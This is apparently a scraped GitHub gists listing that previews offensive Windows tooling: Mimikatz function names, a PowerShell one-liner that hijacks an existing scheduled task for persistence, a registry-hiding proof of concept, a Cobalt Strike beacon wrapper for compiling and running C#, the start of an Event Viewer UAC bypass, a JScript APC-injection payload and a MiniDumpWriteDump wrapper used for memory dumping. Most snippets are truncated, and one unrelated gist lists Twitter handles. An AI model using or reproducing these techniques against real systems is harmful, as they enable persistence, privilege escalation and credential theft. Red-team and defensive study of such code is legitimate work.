Skip to content

Instantly share code, notes, and snippets.


netbiosX netbiosX

View GitHub Profile
View mimistack
143 function Invoke-Mimidogz
140 function Invoke-Mimikatz
29 function Invoke-Mimi
10 function Chokorun
7 function Invoke-Ttest
7 function Invoke-Mimiwormz
7 function Invoke-Me
6 function Invoke-Mimiturtle
6 function Invoke-Mimimi
5 function output
mubix / schtaskmod.ps1
Last active Jul 18, 2019
Modify Scheduled Task
View schtaskmod.ps1
Get-ScheduledTask -TaskName 'XblGameSaveTaskLogon' | % { $_.Actions += New-ScheduledTaskAction -Execute 'calc.exe'; Set-ScheduledTask -TaskPath $_.TaskPath -TaskName $_.TaskName -Action $_.Actions }
Graph-X /
Last active Oct 1, 2019
PoC for hiding things in the registry. My testing hasn't returned any errors when viewing in regedit
from Microsoft.Win32 import Registry
from time import sleep
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
rkey.SetValue(u'\x00 this is a test',u'\x00look at me!')
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
values = rkey.GetValueNames()
print("We have {0} values.".format(str(len(values))))
print("The value names returned are: {0}.".format(values[0]))
value = rkey.GetValue(u'\x00 this is a test')
brettmillerb /
Last active Jan 8, 2020
Generate a list of displaynames/handles from Powershell Twitter List
DisplayName                          Twitterhandle   
-----------                          -------------   
fr016                                @fr0161         
chgopsug                             @chgopsug       
Kevin Bates                          @_bateskevin    
Danny Maertens                       @maertend33     
Julien Reisdorffer                   @JReisdorffer   
Ben Reader                           @powers_hell    
dtmsecurity / sharpgen.cna
Created Nov 8, 2018
SharpGen Aggressor Beacon Wrapper
View sharpgen.cna
$dotnetpath = "/usr/local/share/dotnet/dotnet";
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll";
$temppath = "/tmp/";
beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n");
alias sharpgen{
$executionId = "sharpgen_" . int(rand() * 100000);
$temporaryCsharp = $temppath . $executionId . ".cs";
$executableFilename = $temppath . $executionId . ".exe";
leoloobeek / EventVwrBypass.cs
Last active Mar 6, 2021
Event Viewer UAC Bypass in CSharp for use with InstallUtil.exe
View EventVwrBypass.cs
using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using Microsoft.Win32;
InstallUtil.exe C# version of Event Viewer UAC bypass

Initial Notes:

  • The .NET Runtime Event Provider requires setting COMPLUS_ETWEnabled=1 in your process' environment.
  • CLRConfig will look for configurations in the following places in the following order:
    • Look at environment variables (prepending COMPlus_ to the name)
    • Look at the framework registry keys (HKCU\Software\Microsoft\.NETFramework
    • Look at the framework registry keys HKLM\Software\Microsoft\.NETFramework)
  • These can be set in the following ways:
    • Setting the environment variable COMPlus_:
  • Windows
View gadget2jscriptQueueAPCInject.cs
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Net;
using System.IO.Compression;
public class Payload
View Invoke-Procdump.ps1
$Source = @"
using System;
using System.Runtime.InteropServices;
namespace ProcDump {
public static class DbgHelp {
public static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, IntPtr hFile, IntPtr DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);